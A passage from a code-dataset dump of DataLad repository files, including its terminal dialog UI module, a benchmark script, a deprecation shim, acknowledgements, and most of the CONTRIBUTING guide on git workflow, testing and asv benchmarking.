ds_items: ds_items[0],\n jobs=jobs,\n log_filter=_log_filter_save_dataset,\n unit=\"datasets\",\n lgr=lgr,\n )\n\n\ndef _log_filter_save_dataset(res):\n return res.get('type') == 'dataset' and res.get('action') == 'save'\n" }, { "alpha_fraction": 0.5827828645706177, "alphanum_fraction": 0.5868314504623413, "avg_line_length": 33.67734146118164, "blob_id": "270f473df06bfbddd945dd21b413e1f40bd7c1c2", "content_id": "ceef68c4472ec3aeaf383cb0b3d2fcd5c61edc15", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14079, "license_type": "permissive", "max_line_length": 97, "num_lines": 406, "path": "/datalad/ui/dialog.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Basic dialog-like interface for interactions in the terminal window\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom logging import getLogger\nlgr = getLogger('datalad.ui.dialog')\n\nlgr.log(5, \"Starting importing ui.dialog\")\n\nimport os\nimport sys\nimport time\n\nimport getpass\n\n#!!! OPT adds >100ms to import time!!!\n# from unittest.mock import patch\nfrom collections import deque\nfrom copy import copy\n\nfrom ..utils import auto_repr\nfrom ..utils import on_windows\nfrom .base import InteractiveUI\nfrom datalad.support.exceptions import CapturedException\n\n# Example APIs which might be useful to look for \"inspiration\"\n# man debconf-devel\n# man zenity\n#\n# \"Fancy\" output of progress etc in the terminal:\n# - docker has multiple simultaneous progressbars. Apparently \"navigation\"\n# is obtained with escape characters in the terminal.\n# see docker/pkg/jsonmessage/jsonmessage.go or following snippet\n#\n#from time import sleep\n#import sys\n#\n#out = sys.stderr\n#for i in range(10):\n# diff = 2\n# if i:\n# out.write(\"%c[%dA\" % (27, diff))\n# out.write(\"%d\\n%d\\n\" % (i, i ** 2))\n# sleep(0.5)\n#\n# They also use JSON representation for the message which might provide a nice abstraction\n# Other useful codes\n# // <ESC>[2K = erase entire current line\n# fmt.Fprintf(out, \"%c[2K\\r\", 27)\n# and code in docker: pkg/progressreader/progressreader.go pkg/streamformatter/streamformatter.go\n#\n# reference for ESC codes: http://ascii-table.com/ansi-escape-sequences.php\n\n\n@auto_repr\nclass ConsoleLog(object):\n\n progressbars = None\n\n def __init__(self, out=sys.stdout):\n self.out = out\n\n def message(self, msg, cr='\\n'):\n from datalad.log import no_progress\n with no_progress():\n try:\n self.out.write(msg)\n except UnicodeEncodeError as e:\n # all unicode magic has failed and the receiving end cannot handle\n # a particular unicode char. rather than crashing, we replace the\n # offending chars to be able to message at least something, and we\n # log that we did that\n encoding = self.out.encoding\n lgr.debug(\n \"Replacing unicode chars in message output for display: %s\",\n e)\n self.out.write(\n msg.encode(encoding, \"replace\").decode(encoding))\n if cr:\n self.out.write(cr)\n\n def error(self, error):\n self.message(\"ERROR: %s\" % error)\n\n def get_progressbar(self, *args, **kwargs):\n \"\"\"Return a progressbar. See e.g. `tqdmProgressBar` about the interface\n\n Additional parameter is backend to choose among available\n \"\"\"\n backend = kwargs.pop('backend', None)\n # Delay imports of progressbars until actually needed\n if ConsoleLog.progressbars is None:\n from .progressbars import progressbars\n ConsoleLog.progressbars = progressbars\n else:\n progressbars = ConsoleLog.progressbars\n\n if backend is None:\n # Resort to the configuration\n from .. import cfg\n backend = cfg.get('datalad.ui.progressbar', None)\n\n if backend is None:\n try:\n pbar = progressbars['tqdm']\n except KeyError:\n pbar = progressbars.values()[0] # any\n else:\n pbar = progressbars[backend]\n return pbar(*args, out=self.out, **kwargs)\n\n @property\n def is_interactive(self):\n return isinstance(self, InteractiveUI)\n\n\n@auto_repr\nclass SilentConsoleLog(ConsoleLog):\n \"\"\"A ConsoleLog with a SilentProgressbar\"\"\"\n\n def get_progressbar(self, *args, **kwargs):\n from .progressbars import SilentProgressBar\n return SilentProgressBar(*args, **kwargs)\n\n def question(self, text, title=None, **kwargs):\n msg = \"A non-interactive silent UI was asked for a response to a question: %s.\" % text\n if title is not None:\n msg += ' Title: %s.' % title\n if not kwargs.get('hidden'):\n kwargs_str = ', '.join(\n ('%s=%r' % (k, v)\n for k, v in kwargs.items()\n if v is not None))\n if kwargs_str:\n msg += \" Additional arguments: %s\" % kwargs_str\n else:\n msg += \" Additional arguments are not shown because 'hidden' is set.\"\n raise RuntimeError(msg)\n\n\n@auto_repr\nclass QuietConsoleLog(ConsoleLog):\n \"\"\"A ConsoleLog with a LogProgressbar\"\"\"\n\n def get_progressbar(self, *args, **kwargs):\n from .progressbars import LogProgressBar\n return LogProgressBar(*args, **kwargs)\n\n\ndef getpass_echo(prompt='Password', stream=None):\n \"\"\"Q&D workaround until we have proper 'centralized' UI -- just use getpass BUT enable echo\n \"\"\"\n if on_windows:\n # Can't do anything fancy yet, so just ask the one without echo\n return getpass.getpass(prompt=prompt, stream=stream)\n else:\n # We can mock patch termios so that ECHO is not turned OFF.\n # Side-effect -- additional empty line is printed\n\n # def _no_emptyline_write(out):\n # # Additional mock to prevent not needed empty line print since we do have echo\n # # doesn't work since we don't know the stream here really\n # if out == '\\n':\n # return\n # stream.write(out)\n from unittest.mock import patch\n with patch('termios.ECHO', 255 ** 2):\n #patch.object(stream, 'write', _no_emptyline_write(stream)):\n return getpass.getpass(prompt=prompt, stream=stream)\n\n\ndef _get_value(value, hidden):\n return \"<hidden>\" if hidden else value\n\n\n@auto_repr\nclass DialogUI(ConsoleLog, InteractiveUI):\n\n def __init__(self, *args, **kwargs):\n super(DialogUI, self).__init__(*args, **kwargs)\n # ATM doesn't make sense to print the same title for subsequent questions\n # so we will store previous one and not show it if was the previous one shown\n # within 5 seconds from prev question\n self._prev_title = None\n self._prev_title_time = 0\n\n def input(self, prompt, hidden=False):\n \"\"\"Request user input\n\n Parameters\n ----------\n prompt: str\n Prompt for the entry\n \"\"\"\n # if not hidden:\n # self.out.write(msg + \": \")\n # self.out.flush() # not effective for stderr for some reason under annex\n #\n # # TODO: raw_input works only if stdin was not controlled by\n # # (e.g. if coming from annex). So we might need to do the\n # # same trick as get_pass() does while directly dealing with /dev/pty\n # # and provide per-OS handling with stdin being override\n # response = (raw_input if PY2 else input)()\n # else:\n return (getpass.getpass if hidden else getpass_echo)(prompt)\n\n def question(self, text,\n title=None, choices=None,\n default=None,\n hidden=False,\n repeat=None):\n # Do initial checks first\n if default and choices and default not in choices:\n raise ValueError(\"default value %r is not among choices: %s\"\n % (_get_value(default, hidden), choices))\n\n msg = ''\n if title and not (title == self._prev_title and time.time() - self._prev_title_time < 5):\n # might not actually get displayed if all in/out redirected\n # self.out.write(title + \"\\n\")\n # so merge into msg for getpass\n msg += title + os.linesep\n\n def mark_default(x):\n return \"[%s]\" % x \\\n if default is not None and x == default \\\n else x\n\n if choices is not None:\n msg += \"%s (choices: %s)\" % (text, ', '.join(map(mark_default, choices)))\n elif default is not None:\n msg += '{} [{}]'.format(text, default)\n else:\n msg += text\n # Like this:\n #Anaconda format:\n #\n #Question? [choice1|choice2]\n #[default] >>> yes\n attempt = 0\n while True:\n attempt += 1\n if attempt >= 100:\n raise RuntimeError(\"This is 100th attempt. Something really went wrong\")\n\n response = self.input(\"{}: \".format(msg), hidden=hidden)\n # TODO: dedicated option? got annoyed by this one\n # multiple times already, typically we are not defining\n # new credentials where repetition would be needed.\n if hidden and repeat is None:\n repeat = hidden and choices is None\n\n if repeat:\n response_r = self.input('{} (repeat): '.format(msg), hidden=hidden)\n if response != response_r:\n self.error(\"input mismatch, please start over\")\n continue\n\n if response and '\\x03' in response:\n # Ctrl-C is part of the response -> clearly we should not pretend it's all good\n raise KeyboardInterrupt\n\n if not response and default:\n response = default\n break\n\n if choices and response not in choices:\n self.error(\"%r is not among choices: %s. Repeat your answer\"\n % (_get_value(response, hidden), choices))\n continue\n break\n\n self._prev_title = title\n self._prev_title_time = time.time()\n\n return response\n\n\nclass IPythonUI(DialogUI):\n \"\"\"Custom to IPython frontend UI implementation\n\n There is no way to discriminate between web notebook or qt console,\n so we have just a single class for all.\n\n TODO: investigate how to provide 'proper' displays for\n IPython of progress bars so backend could choose the\n appropriate one\n\n \"\"\"\n\n _tqdm_frontend = \"unknown\"\n\n def input(self, prompt, hidden=False):\n # We cannot and probably do not need to \"abuse\" termios\n if not hidden:\n self.out.write(prompt)\n self.out.flush()\n return input()\n else:\n return getpass.getpass(prompt=prompt)\n\n def get_progressbar(self, *args, **kwargs):\n \"\"\"Return a progressbar. See e.g. `tqdmProgressBar` about the\n interface\n\n Additional parameter is backend to choose among available\n \"\"\"\n backend = kwargs.pop('backend', None)\n if self._tqdm_frontend == \"unknown\":\n try:\n from tqdm import tqdm_notebook # check if available etc\n self.__class__._tqdm_frontend = 'ipython'\n except Exception as exc:\n lgr.warning(\n \"Regular progressbar will be used -- cannot import tqdm_notebook: %s\",\n CapturedException(exc)\n )\n self.__class__._tqdm_frontend = None\n if self._tqdm_frontend:\n kwargs.update()\n return super(IPythonUI, self).get_progressbar(\n *args, frontend=self._tqdm_frontend, **kwargs)\n\n\n# poor man thingie for now\n@auto_repr\nclass UnderAnnexUI(DialogUI):\n def __init__(self, specialremote=None, **kwargs):\n if 'out' not in kwargs:\n # to avoid buffering\n # http://stackoverflow.com/a/181654/1265472\n #kwargs['out'] = os.fdopen(sys.stderr.fileno(), 'w', 0)\n # but wasn't effective! sp kist straogjt for now\n kwargs['out'] = sys.stderr\n super(UnderAnnexUI, self).__init__(**kwargs)\n self.specialremote = specialremote\n\n def set_specialremote(self, specialremote):\n lgr.debug(\"Setting specialremote of UI %s to %s\", self, specialremote)\n self.specialremote = specialremote\n\n def get_progressbar(self, *args, **kwargs):\n if self.specialremote:\n kwargs = kwargs.copy()\n kwargs['backend'] = 'annex-remote'\n kwargs['remote'] = self.specialremote\n return super(UnderAnnexUI, self).get_progressbar(\n *args, **kwargs)\n\n\n@auto_repr\nclass UnderTestsUI(DialogUI):\n \"\"\"UI to help with testing functionality requiring interaction\n\n It will provide additional method to push responses to be provided,\n and could be used as a context manager\n \"\"\"\n\n def __init__(self, **kwargs):\n super(UnderTestsUI, self).__init__(**kwargs)\n self._responses = deque()\n\n # TODO: possibly allow to provide expected messages etc, so we could\n # test that those are the actual ones which were given\n def add_responses(self, responses):\n if not isinstance(responses, (list, tuple)):\n responses = [responses]\n self._responses += list(responses)\n return self # so we could use it as a context manager\n\n def get_responses(self):\n return self._responses\n\n def clear_responses(self):\n self._responses = deque()\n\n def question(self, *args, **kwargs):\n if not self._responses:\n raise AssertionError(\n \"We are asked for a response whenever none is left to give\"\n )\n return self._responses.popleft()\n\n # Context manager mode of operation which would also verify that\n # no responses left upon exiting\n def __enter__(self):\n pass\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n responses = copy(self._responses)\n # we should clear the state so there is no side-effect\n self.clear_responses()\n assert not len(responses), \\\n \"Still have some responses left: %s\" % repr(self._responses)\n\nlgr.log(5, \"Done importing ui.dialog\")\n" }, { "alpha_fraction": 0.6322869658470154, "alphanum_fraction": 0.6457399129867554, "avg_line_length": 21.299999237060547, "blob_id": "c1194b4e2e2a2f9fee0a1ce3e41887a6782a22b9", "content_id": "d210a622e28ae14e0be49247fcd1ed475f3c7a8f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "permissive", "max_line_length": 77, "num_lines": 10, "path": "/benchmarks/scripts/heavyout", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom time import time\nimport sys\n\nniter = int(sys.argv[1])\nload = {i: \"x\" * i for i in range(10)}\n\nfor i in range(niter):\n print(\"I am looping already for {} iterations. Load: {}\".format(i, load))\n" }, { "alpha_fraction": 0.7298387289047241, "alphanum_fraction": 0.7298387289047241, "avg_line_length": 26.55555534362793, "blob_id": "51508b60bce9bef481ab5d4df99b38ba06b1abf8", "content_id": "4b5221cd58c1dfa6507ede60d4aff71e4b131d0f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 248, "license_type": "permissive", "max_line_length": 71, "num_lines": 9, "path": "/datalad/plugin/wtf.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.wtf is deprecated and will be removed in a future \"\n \"release. \"\n \"Use the module from its new location datalad.local.wtf instead.\",\n DeprecationWarning)\n\nfrom datalad.local.wtf import *\n" }, { "alpha_fraction": 0.7310469150543213, "alphanum_fraction": 0.7644404172897339, "avg_line_length": 49.3636360168457, "blob_id": "2271faabb0558e70ed4533e9f4ed43e014df6660", "content_id": "e7935595a4ed943cfafed97757d364629c0aa19f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1108, "license_type": "permissive", "max_line_length": 79, "num_lines": 22, "path": "/docs/source/acknowledgements.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Acknowledgments\n***************\n\nDataLad development is being performed as part of a US-German collaboration in\ncomputational neuroscience (CRCNS) project \"DataGit: converging catalogues,\nwarehouses, and deployment logistics into a federated 'data distribution'\"\n(Halchenko_/Hanke_), co-funded by the US National Science Foundation (`NSF\n1429999`_) and the German Federal Ministry of Education and Research (`BMBF\n01GQ1411`_). Additional support is provided by the German federal state of\nSaxony-Anhalt and the European Regional Development\nFund (ERDF), Project: `Center for Behavioral Brain Sciences`_, Imaging Platform\n\nDataLad is built atop the git-annex_ software that is being developed and\nmaintained by `Joey Hess`_.\n\n.. _Halchenko: http://haxbylab.dartmouth.edu/ppl/yarik.html\n.. _Hanke: http://www.psychoinformatics.de\n.. _NSF 1429999: http://www.nsf.gov/awardsearch/showAward?AWD_ID=1429999\n.. _BMBF 01GQ1411: http://www.gesundheitsforschung-bmbf.de/de/2550.php\n.. _Center for Behavioral Brain Sciences: http://cbbs.eu/en/\n.. _git-annex: http://git-annex.branchable.com\n.. _Joey Hess: https://joeyh.name\n" }, { "alpha_fraction": 0.7400577068328857, "alphanum_fraction": 0.7478511929512024, "avg_line_length": 45.19259262084961, "blob_id": "aa0395ab1bcd13ff7ea470f70dbceab7a94cb9c3", "content_id": "9afe05348ef08e04661b21836d580616ed862534", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 31228, "license_type": "permissive", "max_line_length": 365, "num_lines": 675, "path": "/CONTRIBUTING.md", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# Contributing to DataLad\n\n[gh-datalad]: http://github.com/datalad/datalad\n\n## Files organization\n\n- [datalad/](./datalad) is the main Python module where major development is happening,\n with major submodules being:\n - `cmdline/` - helpers for accessing `interface/` functionality from\n command line\n - `customremotes/` - custom special remotes for annex provided by datalad\n - `downloaders/` - support for accessing data from various sources (e.g.\n http, S3, XNAT) via a unified interface.\n - `configs/` - specifications for known data providers and associated\n credentials\n - `interface/` - high level interface functions which get exposed via\n command line (`cmdline/`) or Python (`datalad.api`).\n - `tests/` - some unit- and regression- tests (more could be found under\n `tests/` of corresponding submodules. See [Tests](#tests))\n - [utils.py](./datalad/tests/utils.py) provides convenience helpers used by unit-tests such as\n `@with_tree`, `@serve_path_via_http` and other decorators\n - `ui/` - user-level interactions, such as messages about errors, warnings,\n progress reports, AND when supported by available frontend --\n interactive dialogs\n - `support/` - various support modules, e.g. for git/git-annex interfaces,\n constraints for the `interface/`, etc\n- [benchmarks/](./benchmarks) - [asv] benchmarks suite (see [Benchmarking](#benchmarking))\n- [docs/](./docs) - yet to be heavily populated documentation\n - `bash-completions` - bash and zsh completion setup for datalad (just\n `source` it)\n- [fixtures/](./fixtures) currently not under git, contains generated by vcr fixtures\n- [sandbox/](./sandbox) - various scripts and prototypes which are not part of\n the main/distributed with releases codebase\n- [tools/](./tools) contains helper utilities used during development, testing, and\n benchmarking of DataLad. Implemented in any most appropriate language\n (Python, bash, etc.)\n\nWhenever a new top-level file or folder is added to the repository, it should\nbe listed in `MANIFEST.in` so that it will be either included in or excluded\nfrom source distributions as appropriate. [See\nhere](https://packaging.python.org/guides/using-manifest-in/) for information\nabout writing a `MANIFEST.in`.\n\n## How to contribute\n\nThe preferred way to contribute to the DataLad code base is\nto fork the [main repository][gh-datalad] on GitHub. Here\nwe outline the workflow used by the developers:\n\n\n0. Have a clone of our main [project repository][gh-datalad] as `origin`\n remote in your git:\n\n git clone git://github.com/datalad/datalad\n\n1. Fork the [project repository][gh-datalad]: click on the 'Fork'\n button near the top of the page. This creates a copy of the code\n base under your account on the GitHub server.\n\n2. Add your forked clone as a remote to the local clone you already have on your\n local disk:\n\n git remote add gh-YourLogin [email protected]:YourLogin/datalad.git\n git fetch gh-YourLogin\n\n To ease addition of other github repositories as remotes, here is\n a little bash function/script to add to your `~/.bashrc`:\n\n ghremote () {\n url=\"$1\"\n proj=${url##*/}\n url_=${url%/*}\n login=${url_##*/}\n git remote add gh-$login $url\n git fetch gh-$login\n }\n\n thus you could simply run:\n\n ghremote [email protected]:YourLogin/datalad.git\n\n to add the above `gh-YourLogin` remote. Additional handy aliases\n such as `ghpr` (to fetch existing pr from someone's remote) and \n `ghsendpr` could be found at [yarikoptic's bash config file](http://git.onerussian.com/?p=etc/bash.git;a=blob;f=.bash/bashrc/30_aliases_sh;hb=HEAD#l865)\n\n3. Create a branch (generally off the `origin/master`) to hold your changes:\n\n git checkout -b nf-my-feature\n\n and start making changes. Ideally, use a prefix signaling the purpose of the\n branch\n - `nf-` for new features\n - `bf-` for bug fixes\n - `rf-` for refactoring\n - `doc-` for documentation contributions (including in the code docstrings).\n - `bm-` for changes to benchmarks\n We recommend to not work in the ``master`` branch!\n\n4. Work on this copy on your computer using Git to do the version control. When\n you're done editing, do:\n\n git add modified_files\n git commit\n\n to record your changes in Git. Ideally, prefix your commit messages with the\n `NF`, `BF`, `RF`, `DOC`, `BM` similar to the branch name prefixes, but you could\n also use `TST` for commits concerned solely with tests, and `BK` to signal\n that the commit causes a breakage (e.g. of tests) at that point. Multiple\n entries could be listed joined with a `+` (e.g. `rf+doc-`). See `git log` for\n examples. If a commit closes an existing DataLad issue, then add to the end\n of the message `(Closes #ISSUE_NUMER)`\n\n5. Push to GitHub with:\n\n git push -u gh-YourLogin nf-my-feature\n\n Finally, go to the web page of your fork of the DataLad repo, and click\n 'Pull request' (PR) to send your changes to the maintainers for review. This\n will send an email to the committers. You can commit new changes to this branch\n and keep pushing to your remote -- github automagically adds them to your\n previously opened PR.\n\n(If any of the above seems like magic to you, then look up the\n[Git documentation](http://git-scm.com/documentation) on the web.)\nOur [Design Docs](http://docs.datalad.org/en/stable/design/index.html) provide a\ngrowing collection of insights on the command API principles and the design of\nparticular subsystems in DataLad to inform standard development practice.\n\n## Development environment\n\nWe support Python 3 only (>= 3.7).\n\nSee [README.md:Dependencies](README.md#Dependencies) for basic information\nabout installation of datalad itself.\nOn Debian-based systems we recommend to enable [NeuroDebian](http://neuro.debian.net)\nsince we use it to provide backports of recent fixed external modules we depend upon:\n\n```sh\napt-get install -y -q git git-annex-standalone\napt-get install -y -q patool python3-scrapy python3-{argcomplete,git,humanize,keyring,lxml,msgpack,progressbar,requests,setuptools}\n```\n\nand additionally, for development we suggest to use tox and new\nversions of dependencies from pypy:\n\n```sh\napt-get install -y -q python3-{dev,httpretty,pytest,pip,vcr,virtualenv} python3-tox\n# Some libraries which might be needed for installing via pip\napt-get install -y -q lib{ffi,ssl,curl4-openssl,xml2,xslt1}-dev\n```\n\nsome of which you could also install from PyPi using pip (prior installation of those libraries listed above\nmight be necessary)\n\n```sh\npip install -r requirements-devel.txt\n```\n\nand you will need to install recent git-annex using appropriate for your\nOS means (for Debian/Ubuntu, once again, just use NeuroDebian).\n\nContributor Files History\n-------------------------\n\nThe original repository provided a [.zenodo.json](.zenodo.json)\nfile, and we generate a [.contributors file](.all-contributorsrc) from that via:\n\n```bash\npip install tributors\ntributors --version\n0.0.18\n```\n\nIt helps to have a GitHub token to increase API limits:\n\n```bash\nexport GITHUB_TOKEN=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n```\n\nInstructions for these environment variables can be found [here](https://con.github.io/tributors/docs/getting-started#2-environment). \nThen update zenodo:\n\n```bash\ntributors update zenodo\nINFO: zenodo:Updating .zenodo.json\nINFO: zenodo:Updating .tributors cache from .zenodo.json\nWARNING:tributors:zenodo does not support updating from names.\n```\n\nIn the case that there is more than one orcid found for a user, you will be given a list\nto check. Others will be updated in the file. You can then curate the file as you see fit.\nWe next want to add the .allcontributors file:\n\n```bash\n$ tributors init allcontrib\nINFO:allcontrib:Generating .all-contributorsrc for datalad/datalad\n$ tributors update allcontrib\nINFO:allcontrib:Updating .all-contributorsrc\nINFO:allcontrib:Updating .tributors cache from .all-contributorsrc\nINFO:allcontrib:⭐️ Found new contributor glalteva in .all-contributorsrc\nINFO:allcontrib:⭐️ Found new contributor adswa in .all-contributorsrc\nINFO:allcontrib:⭐️ Found new contributor chrhaeusler in .all-contributorsrc\n...\nINFO:allcontrib:⭐️ Found new contributor bpoldrack in .all-contributorsrc\nINFO:allcontrib:⭐️ Found new contributor yetanothertestuser in .all-contributorsrc\nWARNING:tributors:allcontrib does not support updating from orcids.\nWARNING:tributors:allcontrib does not support updating from email.\n```\n\nWe can then populate the shared .tributors file:\n\n```bash\n$ tributors update-lookup allcontrib\n```\n\nAnd then we can rely on the [GitHub action](.github/workflows/update-contributors.yml) to update contributors. The action is set to run on merges to master, meaning when the contributions are finalized. This means that we add new contributors, and we\nlook for new orcids as we did above.\n\n## Additional Hints\n\n### Merge commits\n\nFor merge commits to have more informative description, add to your\n`.git/config` or `~/.gitconfig` following section:\n\n [merge]\n log = true\n\nand if conflicts occur, provide short summary on how they were resolved\nin \"Conflicts\" listing within the merge commit\n(see [example](https://github.com/datalad/datalad/commit/eb062a8009d160ae51929998771964738636dcc2)).\n\n\n## Quality Assurance\n\nIt is recommended to check that your contribution complies with the following\nrules before submitting a pull request:\n\n- All public methods should have informative docstrings with sample usage\n presented as doctests when appropriate.\n\n- All other tests pass when everything is rebuilt from scratch.\n\n- New code should be accompanied by tests.\n\nThe documentation contains a [Design Document specifically on running and writing tests](http://docs.datalad.org/en/stable/design/testing.html) that we encourage you to read beforehand.\nFurther hands-on advice is detailed below.\n\n### Tests\n\n`datalad/tests` contains tests for the core portion of the project, and\nmore tests are provided under corresponding submodules in `tests/`\nsubdirectories to simplify re-running the tests concerning that portion\nof the codebase. To execute many tests, the codebase first needs to be\n\"installed\" in order to generate scripts for the entry points. For\nthat, the recommended course of action is to use `virtualenv`, e.g.\n\n```sh\nvirtualenv --system-site-packages venv-tests\nsource venv-tests/bin/activate\npip install -r requirements.txt\npython setup.py develop\n```\n\nand then use that virtual environment to run the tests, via\n\n```sh\npytest datalad\n```\n\nthen to later deactivate the virtualenv just simply enter\n\n```sh\ndeactivate\n```\n\nAlternatively, or complimentary to that, you can use `tox` -- there is a `tox.ini`\nfile which sets up a few virtual environments for testing locally, which you can\nlater reuse like any other regular virtualenv for troubleshooting.\nAdditionally, [tools/testing/test_README_in_docker](tools/testing/test_README_in_docker) script can\nbe used to establish a clean docker environment (based on any NtesteuroDebian-supported\nrelease of Debian or Ubuntu) with all dependencies listed in README.md pre-installed.\n\n### CI setup\n\nWe are using several continuous integration services to run our tests battery for every PR and on the default branch.\nPlease note that new a contributor's first PR needs workflow approval from a team member to start the CI runs, but we promise to promptly review and start the CI runs on your PR.\nAs the full CI suite takes a while to complete, we recommend to run at least tests directly related to your contributions locally beforehand.\nLogs from all CI runs are collected periodically by [con/tinuous](https://github.com/con/tinuous/) and archived at `smaug:/mnt/btrfs/datasets/datalad/ci/logs/`.\nFor developing on Windows you can use free [Windows VMs](https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/).\nIf you would like to propose patch against `git-annex` itself, submit them against [datalad/git-annex](https://github.com/datalad/git-annex/#submitting-patches) repository which builds and tests `git-annex`.\n\n### Coverage\n\nYou can also check for common programming errors with the following tools:\n\n- Code with good unittest coverage (at least 80%), check with:\n\n pip install pytest coverage\n pytest --cov=datalad path/to/tests_for_package\n\n- We rely on https://codecov.io to provide convenient view of code coverage.\n Installation of the codecov extension for Firefox/Iceweasel or Chromium\n is strongly advised, since it provides coverage annotation of pull\n requests.\n\n### Linting\n\nWe are not (yet) fully PEP8 compliant, so please use these tools as\nguidelines for your contributions, but not to PEP8 entire code\nbase.\n\n[beyond-pep8]: https://www.youtube.com/watch?v=wf-BqAjZb8M\n\n*Sidenote*: watch [Raymond Hettinger - Beyond PEP 8][beyond-pep8]\n\n- No pyflakes warnings, check with:\n\n pip install pyflakes\n pyflakes path/to/module.py\n\n- No PEP8 warnings, check with:\n\n pip install pep8\n pep8 path/to/module.py\n\n- AutoPEP8 can help you fix some of the easy redundant errors:\n\n pip install autopep8\n autopep8 path/to/pep8.py\n\nAlso, some team developers use\n[PyCharm community edition](https://www.jetbrains.com/pycharm) which\nprovides built-in PEP8 checker and handy tools such as smart\nsplits/joins making it easier to maintain code following the PEP8\nrecommendations. NeuroDebian provides `pycharm-community-sloppy`\npackage to ease pycharm installation even further.\n\n### Benchmarking\n\nWe use [asv] to benchmark some core DataLad functionality.\nThe benchmarks suite is located under [benchmarks/](./benchmarks), and\nperiodically we publish results of running benchmarks on a dedicated host\nto http://datalad.github.io/datalad/ . Those results are collected\nand available under the `.asv/` submodule of this repository, so to get started\n\n- `git submodule update --init .asv`\n- `pip install .[devel]` or just `pip install asv`\n- `asv machine` - to configure asv for your host if you want to run\n benchmarks locally\n\nAnd then you could use [asv] in multiple ways.\n\n#### Quickly benchmark the working tree\n\n- `asv run -E existing` - benchmark using the existing python environment\n and just print out results (not stored anywhere). You can add `-q`\n to run each benchmark just once (thus less reliable estimates)\n- `asv run -b api.supers.time_createadd_to_dataset -E existing`\n would run that specific benchmark using the existing python environment\n\nNote: `--python=same` (`-E existing`) seems to have restricted\napplicability, e.g. can't be used for a range of commits, so it can't\nbe used with `continuous`.\n\n#### Compare results for two commits from recorded runs\n\nUse [asv compare] to compare results from different runs, which should be\navailable under `.asv/results/<machine>`. (Note that the example\nbelow passes ref names instead of commit IDs, which requires asv v0.3\nor later.)\n\n```shell\n> asv compare -m hopa maint master\n\nAll benchmarks:\n\n before after ratio\n [b619eca4] [7635f467]\n- 1.87s 1.54s 0.82 api.supers.time_createadd\n- 1.85s 1.56s 0.84 api.supers.time_createadd_to_dataset\n- 5.57s 4.40s 0.79 api.supers.time_installr\n 145±6ms 145±6ms 1.00 api.supers.time_ls\n- 4.59s 2.17s 0.47 api.supers.time_remove\n 427±1ms 434±8ms 1.02 api.testds.time_create_test_dataset1\n- 4.10s 3.37s 0.82 api.testds.time_create_test_dataset2x2\n 1.81±0.07ms 1.73±0.04ms 0.96 core.runner.time_echo\n 2.30±0.2ms 2.04±0.03ms ~0.89 core.runner.time_echo_gitrunner\n+ 420±10ms 535±3ms 1.27 core.startup.time_help_np\n 111±6ms 107±3ms 0.96 core.startup.time_import\n+ 334±6ms 466±4ms 1.39 core.startup.time_import_api\n```\n\n\n#### Run and compare results for two commits\n\n[asv continuous] could be used to first run benchmarks for the to-be-tested\ncommits and then provide stats:\n\n- `asv continuous maint master` - would run and compare `maint` and `master` branches\n- `asv continuous HEAD` - would compare `HEAD` against `HEAD^`\n- `asv continuous master HEAD` - would compare `HEAD` against state of master\n- [TODO: continuous -E existing](https://github.com/airspeed-velocity/asv/issues/338#issuecomment-380520022)\n\nNotes:\n- only significant changes will be reported\n- raw results from benchmarks are not stored (use `--record-samples` if\n desired)\n\n#### Run and record benchmarks results (for later comparison etc)\n\n- `asv run` would run all configured branches (see\n [asv.conf.json](./asv.conf.json))\n\n\n#### Profile a benchmark and produce a nice graph visualization\n\nExample (replace with the benchmark of interest)\n\n asv profile -v -o profile.gprof usecases.study_forrest.time_make_studyforrest_mockup\n gprof2dot -f pstats profile.gprof | dot -Tpng -o profile.png \\\n && xdg-open profile.png\n\n#### Common options\n\n- `-E` to restrict to specific environment, e.g. `-E virtualenv:2.7`\n- `-b` could be used to specify specific benchmark(s)\n- `-q` to run benchmark just once for a quick assessment (results are\n not stored since too unreliable)\n\n\n[asv compare]: http://asv.readthedocs.io/en/latest/commands.html#asv-compare\n[asv continuous]: http://asv.readthedocs.io/en/latest/commands.html#asv-continuous\n\n[asv]: http://asv.readthedocs.io\n\n\n## Easy Issues\n\nA great way to start contributing to DataLad is to pick an item from the list of\n[Easy issues](https://github.com/datalad/datalad/labels/easy) in the issue\ntracker. Resolving these issues allows you to start contributing to the project\nwithout much prior knowledge. Your assistance in this area will be greatly\nappreciated by the more experienced developers as it helps free up their time to\nconcentrate on other issues.\n\n## Maintenance teams coordination\n\nWe distinguish particular aspects of DataLad's functionality, each corresponding\nto parts of the code base in this repository, and loosely maintain teams assigned\nto these aspects.\nWhile any contributor can tackle issues on any aspect, you may want to refer to\nmembers of such teams (via GitHub tagging or review requests) or the team itself\n(via GitHub issue label ``team-<area>``) when creating a PR, feature request, or bug report.\nMembers of a team are encouraged to respond to PRs or issues within the given area,\nand pro-actively improve robustness, user experience, documentation, and\nperformance of the code.\n\nNew and existing contributors are invited to join teams:\n\n- **core**: core API/commands (@datalad/team-core)\n\n- **git**: Git interface (e.g. GitRepo, protocols, helpers, compatibility) 